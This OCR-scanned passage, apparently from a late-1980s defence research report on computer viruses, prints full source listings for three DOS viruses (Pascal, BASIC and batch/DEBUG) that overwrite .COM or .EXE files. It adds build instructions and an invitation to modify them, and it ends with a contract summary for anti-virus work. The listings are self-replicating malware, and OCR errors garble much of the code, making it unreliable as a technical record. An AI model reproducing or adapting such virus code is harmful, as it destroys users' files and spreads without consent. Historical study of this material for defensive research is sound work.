FDate , 

FLsize , 

FHsize  :  Integer; 

FullName:  Array[1..13]  of  Char; 

End ; 

Registers  =  Record  {^Register  set  used  for  file  search  13 
Case  Byte  of 

1  :  (AX,BX,CX,DX,BP,SI,DI,DS,ES, Flags  :  Integer); 

2  :  ( AL, AH , BL , BH , CL , CH , DL , DH  :  Byte); 

End ; 


£  --  Variables 
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Var 


ProgramStart 

Marklnf ected 
:  Registers; 

DTA 

Buffer 

TestID 

UsePath 


C  Memory  offset  program  code  ) 
Byt<=“  absolute  Cseg:$100; 

C  Infected  marker  ) 
String! 42]  absolute  Cseg:$180;  Reg 
4  Register  set  ) 

DTARec;  <4  Data  area  3 

Array[Byte]  of  Byte;  C  Data  buffer  3 

String[42];  £_ To  recognize  infected  files  > 
String[66];  C  Path  to  search  files  J 

4  Length  of  search  path  3 


File  to  infect  2> 
Used  ■> 

- ) 


UsePathLenght :  Byte  absolute  UsePath; 

Go  :  File; 

B  :  Byte; 

C  —  Program  code - 

Begin 

WriteLn( Warning ) ;  £  Display  warning  message 

GetDir(0,  UsePath);  ^  get  current  directory  ^ 

if  Pos('N',  UsePath)  UsePathLenght  then 
UsePath  :=  UsePath  +  'N'; 

UsePath  :=  UsePath  +  '*.COM';  £  Define  search  mask 

Reg. AH  :=  $1A;  £  Set  data  area 

Reg.DS  :=  Seg(DTA); 

Reg.DX  :=  Of s{ DTA) ; 

MsDos ( Reg ) ; 

UsePath[ Succ ( UsePathLenght )] :=#0 ;  £  Path  must  end  with  #0 
Reg. AH  :=  $4E; 

Reg.DS  :=  Seg( UsePath ) ; 

Reg.DX  :=  Of s { UsePath [ 1 ] ) ; 

Reg  CX  :=  $ff;  £  Set  attribute  to  find  ALL  files  y 

MsDos(Reg);  £  Find  first  matching  entry 

IF  not  Odd(Reg .Flags )  Then  £  If  a  file  found  then  'J 

Repeat 

UsePath  :=  DTA . FullName ; 

B  :=  Pos ( #0 ,  UsePath) ; 

If  B  >  0  then 

Delete  (  UsePath  ,  B,  255);  Remove  garbage 

Assign(Go,  UsePath); 

Reset ( Go ) ; 

If  IOresult  =  0  Then  £  If  not  10  error  then 

Begin 

BlockRead ( Go ,  Buffer,  2); 

Move( Buffer [ $80 ] ,  TestID,  43); 

•£,  Test  if  file  already  ill  ( Inf  ected ) 

If  TestID  <>  Warning  Then  £  If  not  then  ...  ^5 

Begin 

Seek  ( Go ,  0 ) ; 

C  Mark  file  as  infected  and  , .  y 
Marklnfected  :=  Warning; 

C  Infect  it  y 

BlockWrite ( Go , ProgramStart , Succ ( VirusSize  shr  7); 
Close ( Go ) ; 

C.  Say  what  has  been  done  y 
WriteLn( UsePath  +  'infected.'); 

Halt;  £. .  and  halt  the  program  y 

End  ; 

Close ( Go ) ; 

End;  £  The  file  has  already  been  infected,  search 

next .  1) 

Reg. AH  :=  $4F; 
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Reg.DS  :=  Seg(DTA); 

Reg.DX  :=  Ofs(DTA) ; 

MsDos(Reg); 

£  . Until  no  more  files  are  found 

Until  Odd ( Red . Flags )  ; 

Write(  '(Smiley  )  ;  (^Give  a  smile 

End. 


Although  this  is  a  primitive  virus  its  effective. In  this  virus 
only  the  .COM  files  are  infected.  Its  about  12K  and  it  will 
change  the  date  entry. 


Virus  in  Basic 


Basic  is  reasonably  easy  to  comprehend  computer  instructional 
language.  Often  people  think  of  it  as  limited  and  not  of  use 
in  creating  a  virus.  What  follows  proves  that  doubters  are  wrong. 
Lets  take  a  look  at  a  Basic  Virus  created  by  R.  Burger  in  1987. 
This  program  is  an  overwriting  virus.  The  program  uses  (Shell) 
MS-DOS  to  infect  .EXE  files.  To  do  this  you  must  compile  the 
source  code  using  a  the  Microsoft  Quick-BASIC.  Note  the  length 
of  the  compiled  program  and  the  length  of  the  linked  .EXE  file 
and  edit  the  source  code  to  place  the  length  of  the  object 
program  in  the  LENGTHVIR  variable.  BV3.EXE  should  be  in  the 
current  directory,  COMMAND.COM  must  be  available,  the  LENGHTVIR 
variable  must  be  set  to  the  length  of  the  linked  program. 
Remember  to  use  /e  parameter  when  compiling. 

10  REM  **  DEMO 

20  REM  **  MODIFY  IT  YOUR  OWN  WAY  IF  DESIRED  ** 

30  REM  **  BASIC  DOESNT  SUCK 

40  REM  **  NO  KIDDING 

50  ON  ERROR  GOTO  670 

60  REM  ***  LENGHTVIR  MUST  BE  SET  ** 

70  REM  ***  TO  THE  LENGHT  TO  THE  ** 

80  REM  ***  LINKED  PROGRAM  *** 

90  LENGHTVIR=2641 
100  VIRR00T$="BV3 . EXE" 

110  REM  ***  WRITE  THE  DIRECTORY  IN  THE  FILE  "INH" 

130  SHELL  "DIR  *.  EXE,;  INH" 

140  REM  **  OPEN  "INH"  FILE  AND  READ  NAMES  ** 

150  OPEN  "R" ,1, "INH" ,32000 
160  GET  #1,1 

170  LINE  INPUT# 1 , ORIGINALS 
180  LINE  INPUT# 1 , ORIGINALS 
190  LINE  INPUT# 1 , ORIGINALS 
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200  LINE  INPUT# 1, ORIGINAL$ 

210  ON  ERROR  GOT  670 
220  CLOSE# 2 

230  F=1 : LINE  INPUT#1 , ORIGINALS 

240  REM  **  "%"  IS  THE  MARKER  OP  THE  BV3 

250  REM  **  "%"  IN  THE  NAME  MEANS  260  REM  **  INFECTED  COPY 
PRESENT 

270  IF  MID$ ( ORIGINALS ,1,1)="%"  THEN  GOTO  210 
280  ORIGINAL$=MID$ (ORIGINALS ,1,13) 

290  EXTENSIONS$=MIDS (ORIGINAL, 9 , 13 ) 

300  MID$ ( EXTENSIONSS ,1,1)="." 

310  REM  ***  CONCATENATE  NAMES  INTO  FILENAMES  ** 

320  F=F+1 

330  IF  MID$ (ORIGINALS, F,1 )="  "  OR  MID$  ( ORIGINALS , F , 1 )=". "  OR 
F=13  THEN 
GOTO  350 
340  GOTO  320 

350  ORIGINAL$=MID$ ( ORIGINALS , 1 , F-l ) +EXTENSION$ 

360  ON  ERROR  GOTO  210 
365  TEST$=" " 

370  REM  ++  OPEN  FILE  FOUND  +++ 

380  OPEN  "R" , 2 ,OROGINAL$ , LENGHTVIR 

390  IF  LOF ( 2 )  <  LENGHTVIR  THEN  GOTO  420 

400  GET  #2,2 

410  LINE  INPUT#1, TESTS 

420  CLOSE#2 

431  REM  ++  CHECK  IF  PROGRAM  IS  ILL  ++ 

440  REM  ++  "%"  AT  THE  END  OF  THE  FILE  MEANS.. 

450  REM  ++  FILE  IS  ALREADY  SICK  ++ 

460  REM  IF  MI D$ ( TEST ,2,1)="%"  THEN  GOTO  210 
470  CLOSE# 1 

480  ORIGINALS$=ORIGINAL$ 

490  MID$ (ORIGINALSS ,1,1)="%" 

499  REM  ++++  SANE  "HEALTHY"  PROGRAM  ++++ 

510  C$="COPY  "+ORIGINALS+"  "+ORIGINALSS 
520  SHELL  C$ 

530  REM  ***  COPY  VIRUS  TO  HEALTHY  PROGRAM  **** 

540  C$="COPY  "+VIRROOTS+ORIG INAL$ 

550  SHELL  C$ 

560  REM  ***  APPEND  VIRUS  MARKER  *** 

570  OPEN  ORIGINALS  FOR  APPEND  AS  #1  LEN=13 
580  WRITE#1, ORIGINALSS 
590  CLOSE# 1 

630  REM  ++  OUYPUT  MESSAGE  ++ 

640  PRINT  "INFECTION  IN  "  ; ORIGI ANAL$ ;  "  ! !  BE  WARE  !!" 

650  SYSTEM 

660  REM  **  VIRUS  ERROR  MESSAGE 

670  PRINT  "VIRUS  INTERNAL  ERROR  GOTTCHA  III!”: SYSTEM 
680  END 
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This  basic  virus  will  only  attack  .EXE  files.  After  the  execution 
you  will  see  a  "INK"  file  which  contains  the  directory,  and  the 
file  %SORT.EXE.  Programs  which  start  with  "%"  are  NOT  infected, 
they  pose  as  back  up  copies. 


Batch  Viruses 


Most  researchers  cannot  imagine  that  viruses  could  be  in  BATCH 
file.  The  virus  which  you  are  about  to  see  depicted  makes  use  of 
the  MS-DOS  operating  system.  This  BATCH  virus  uses  DEBUG  &  EDLIN 
programs  from  the  O/S. 


Name:  VR.BAT 


echo  =  off 
ctty  nul 

path  crNmsdos 
dir  *.com/w^ind 

edlin  ind<l 

debug  ind<2 
edlin  name. bat <3 

ctty  con 
name 


(  Self  explanatory) 

(  This  is  important.  Console  output  is  turned 
off) 

(  May  differ  on  other  systems  ) 

(  The  directory  is  written  on  "ind"  ONLY  name 
entries ) 

(  "Ind"  is  processed  with  EDLIN  so  only  file 
names  appear) 

(  New  batch  program  is  created  with  debug) 

(  This  batch  goes  to  an  executable  form 
because  of  EDLIN) 

(  Console  interface  is  again  assigned) 

(  Newly  created  NAME . BAT  is  called. 


In  addition  to  file  to  this  Batch  file, there  command  files,  named 
1,2,3 

Here  is  the  first  command  file: 

Name :  1 

l,4d  (  Here  line  1-4  of  the  "IND"  file  are  deleted  ) 

e  (  Save  file  ) 

Here  is  the  second  command  file: 

Name :  2 


ml00,10b,f000 

elO 8  ".BAT" 
mlOO , 10b, f 010 
el00"DEL  " 


(  First  program  name  is  moved  to  the  F000H 
address  to  save) 

(  Extention  of  file  name  is  changed  to  .BAT) 
(  File  is  saved  again) 

(  DEL  command  is  written  to  address  100H) 
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mf 000 , f 00b, 104  (  Original  file  is  written  after  this  command) 

elOc  2e  (  Period  is  placed  in  from  of  extension) 

ellO  0d,0a  (  Carriage  return  plus  line  feed) 

mf 010 , f 020 , Ilf  (  Modified  file  is  moved  to  11FH  address  from 

buffer  area) 

ell2  "COPY  NVR.BAT"(  COPY  command  is  now  placed  in  front  of 

file ) 

el2b  od,0a  (  COPY  command  terminated  with  carriage  return 

+  If ) 

rxc  (  The  CX  register  is  ...  ) 

2c  (  set  to  2CH) 

nname.bat  {  Name  it  NAME.BAT) 

w  (  Write  ) 

q  (  quit  ) 


The  third  command  file  must  be  printed  as  a  hex  dump  because  it 
contains  2  control  characters  ( lAh=Control  Z)  and  this  is  not 
entirely  printable. 

Hex  dump  of  the  third  command  file: 


Name:  3 


0100  31 

2C 

31 

3F 

52 

20 

1A 

0D-6E 

79 

79 

79 

79 

79 

79 

79 

1 

f 

1 

? 

• 

.  n 

y 

y 

y 

y 

y 

y 

y 

0110  79 

29 

0D 

32 

2C 

32 

3F 

52-20 

1A 

OD 

6E 

6E 

79 

79 

79 

•  2  , 

7 

7 

r 

• 

• 

n  n 

y 

y 

y 

0120  79 

79 

79 

79 

29 

0D 

45 

0D-00 

00 

00 

00 

00 

00 

00 

00 

y 

y 

y 

y 

. 

E 

•  • 

• 

. 

« 

• 

• 

• 

• 

In  order  for  this  virus  to  work  VR.BAT  should  be  in  the  root. 
This  program  only  affects  .COM  files. 

End  Note 


All  these  viruses  can  be  modified  to  suit  the  needs  and  the 
experience  level  of  the  manipulator. 
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APPENDIX  B 


A001  -  SClajnFIC  AND  TECHNICAL  REPORTS  SCM4ARY  SPECIAL  TECHNICAL  SUMMARY 
Contract  No.:  DASG60-89-C-0044 


I.  The  purpose  of  this  research  is  to  create  a  front-end  product  to  prevent/ 
detect/discourage  computer  virus  intrusions  and  enhance  correction /recovery 
mechanisms  to  prevent  damage,  downtime,  or  inaccuracies  in  minicomputer  and 
higher- level  systems.  Although  there  are  many  personal  computer-based  anti¬ 
virus  systems,  we  know  of  none  for  minicomputer  or  higher-level  systems. 

Problems  to  be  overcome  will  include  system  compatibilities,  communica- 
tions/protocols  compatibilities,  system  entryways,  and  mechanism/method  compre¬ 
hensiveness  and  applicability. 

II.  1.  Analyze  information  on  the  hardware  configuration,  operating  sys¬ 
tem,  languages,  utilities,  communications/protocols,  and  security  of  CDC-Cyber 
sy steams,  Convex,  Alliance,  Cray,  DEC  Vax,  and  DEC  8800  series  systems. 

2.  Choose  a  system  for  in-depth  analysis  and  bread- board  testing. 

3.  Research  and  listing  of  generic  viral  attack  mechanism,  such  as, 
those  that  attack/corrupt  CPUs  (Central  Processing  Units),  memory,  storage, 
backup,  et.al. 

4.  Research  and  listing  of  protection/prevention  methods  for  each  mech¬ 
anism  in  the  form  of  a  work  breakdown  structure/decision  tree  to  show  any  inter¬ 
relationships  between  prevention  methods. 

5.  Decide  on  protection/prevention  mechanism: 

A.  manual  mechanisms 

B.  automated  mechanisms 

C.  reasoning  for  each 

6.  Compose  a  raw  code  program  for  front-end  prevention/protection 
mechanism  for  system. 

7.  Report  and  demonstration . 


III.  ANCILLARY  C30NSIDENATICNS: 

1.  Evaluation  of  user-friendliness  as  an  aid  or  hindrance  as  it  applies 
to  unclassified,  confidential,  secret,  and  top-secret  systems. 

2.  Generic  applications  to  minicomputer  and  higher-level  systems  and  envi¬ 
ronments  . 
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A001  -  SCIENTIFIC  AND  TECHNICAL  REPORTS  SUMMARY  SPECIAL  TECHNICAL  StJ-MARY 
Contract  No.:  DASG60-89-C-0044 


3.  Consideration  of  a  viral  cyclical  redundancy  check  program  to  warn  of 
infections  and  halt  infected  program  execution.  The  program  would  be  free- 
running  within  a  system  and  is  similar  to  the  early  NCR  Century  series  Operating 
System  upgrade  architecture,  i.e.,  benign  VIRUS. 

IV.  Anticipated  payoff  will  be  an  anti-viral,  front-end  protection  mechanism/ 
method  (along  with  possible  complimentary  mechanisms/methods)  which  will  protect 
USASDC  systems  from  viral  attack  and  concomitant  downtime. 
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